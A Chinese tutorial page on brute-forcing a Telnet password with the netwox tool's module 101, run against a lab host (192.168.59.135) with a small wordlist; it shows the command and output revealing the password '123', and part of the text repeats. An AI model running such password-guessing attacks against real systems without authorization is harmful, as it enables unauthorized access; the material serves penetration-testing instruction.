暴力破解Telnet服务
远程登录 Telnet 服务器需要知道登录的用户名和密码。如果只知道用户名而不知道密码是无法登录的。在渗透测试中,就需要对密码进行暴力破解。
netwox 工具提供了编号为 101 的模块,用于密码暴力破解。
【实例】已知 Telnet 服务器的 IP 地址为 192.168.59.135,登录用户名为 sm。使用密码字典 password.txt 进行暴力破解,获取登录的密码。
1) 查看密码字典 password.txt 中的密码,执行命令如下:
2) 进行密码暴力破解,执行命令如下:
这里,暴力破解成功,Telnet 服务器的登录密码为 123。
netwox 工具提供了编号为 101 的模块,用于密码暴力破解。
【实例】已知 Telnet 服务器的 IP 地址为 192.168.59.135,登录用户名为 sm。使用密码字典 password.txt 进行暴力破解,获取登录的密码。
1) 查看密码字典 password.txt 中的密码,执行命令如下:
root@daxueba:~# cat /password.txt
输出信息如下:
admin
abc
19890106
123
ab12
root
2) 进行密码暴力破解,执行命令如下:
root@daxueba:~# netwox 101 -i 192.168.59.135 -L sm -w /password.txt
输出信息如下:Trying(thread1) "sm" - "admin" #尝试使用密码admin Trying(thread2) "sm" - "abc" Trying(thread3) "sm" - "19890106" Trying(thread4) "sm" - "123" Trying(thread5) "sm" - "ab12" Couple(thread2) "sm" - "abc" -> bad Trying(thread2) "sm" - "root" Couple(thread1) "sm" - "admin" -> bad #使用密码admin进行匹配, 密码错误 Couple(thread3) "sm" - "19890106" -> bad Couple(thread5) "sm" - "ab12" -> bad Couple(thread4) "sm" - "123" -> good #使用密码123进行匹配, 密码正确 Couple(thread2) "sm" - "root" -> bad输出信息显示,尝试使用密码字典的所有密码与用户名进行匹配。如果密码错误,将显示 bad;如果密码正确,则显示 good。
这里,暴力破解成功,Telnet 服务器的登录密码为 123。
所有教程
- C语言入门
- C语言编译器
- C语言项目案例
- 数据结构
- C++
- STL
- C++11
- socket
- GCC
- GDB
- Makefile
- OpenCV
- Qt教程
- Unity 3D
- UE4
- 游戏引擎
- Python
- Python并发编程
- TensorFlow
- Django
- NumPy
- Linux
- Shell
- Java教程
- 设计模式
- Java Swing
- Servlet
- JSP教程
- Struts2
- Maven
- Spring
- Spring MVC
- Spring Boot
- Spring Cloud
- Hibernate
- Mybatis
- MySQL教程
- MySQL函数
- NoSQL
- Redis
- MongoDB
- HBase
- Go语言
- C#
- MATLAB
- JavaScript
- Bootstrap
- HTML
- CSS教程
- PHP
- 汇编语言
- TCP/IP
- vi命令
- Android教程
- 区块链
- Docker
- 大数据
- 云计算